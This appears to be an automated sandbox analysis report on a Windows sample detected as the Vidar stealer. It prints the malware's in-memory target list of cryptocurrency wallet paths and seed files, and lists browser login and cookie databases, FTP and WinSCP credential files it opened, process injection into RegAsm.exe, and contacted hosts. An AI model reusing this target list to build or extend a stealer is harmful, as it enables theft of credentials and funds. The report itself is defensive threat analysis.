                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Opens network shares
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A0C40 sqlite3_bind_zeroblob,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A0D60 sqlite3_bind_parameter_name,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8C8EA0 sqlite3_clear_bindings,

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		Boot or Logon Initialization Scripts511
                  Process Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager4
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS55
                  System Information Discovery                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Virtualization/Sandbox Evasion                  		LSA Secrets1
                  Network Share Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts511
                  Process Injection                  		Cached Domain Credentials141
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1443407 Sample: file.exe Startdate: 17/05/2024 Architecture: WINDOWS Score: 100 33 steamcommunity.com 2->33 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 8 other signatures 2->45 9 file.exe 1 2->9         started        signatures3 process4 signatures5 47 Contains functionality to inject code into remote processes 9->47 49 Writes to foreign memory regions 9->49 51 Allocates memory in foreign processes 9->51 53 Injects a PE file into a foreign processes 9->53 12 RegAsm.exe 1 46 9->12         started        17 conhost.exe 9->17         started        process6 dnsIp7 35 steamcommunity.com 104.102.42.29, 443, 49704 AKAMAI-ASUS United States 12->35 37 95.217.240.101, 443, 49705, 49706 HETZNER-ASDE Germany 12->37 25 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 12->25 dropped 27 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->27 dropped 29 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->29 dropped 31 10 other files (none is malicious) 12->31 dropped 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 12->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->59 61 6 other signatures 12->61 19 cmd.exe 1 12->19         started        file8 signatures9 process10 process11 21 conhost.exe 19->21         started        23 timeout.exe 1 19->23         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe100%AviraHEUR/AGEN.1352999
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\nss3.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll0%ReversingLabs
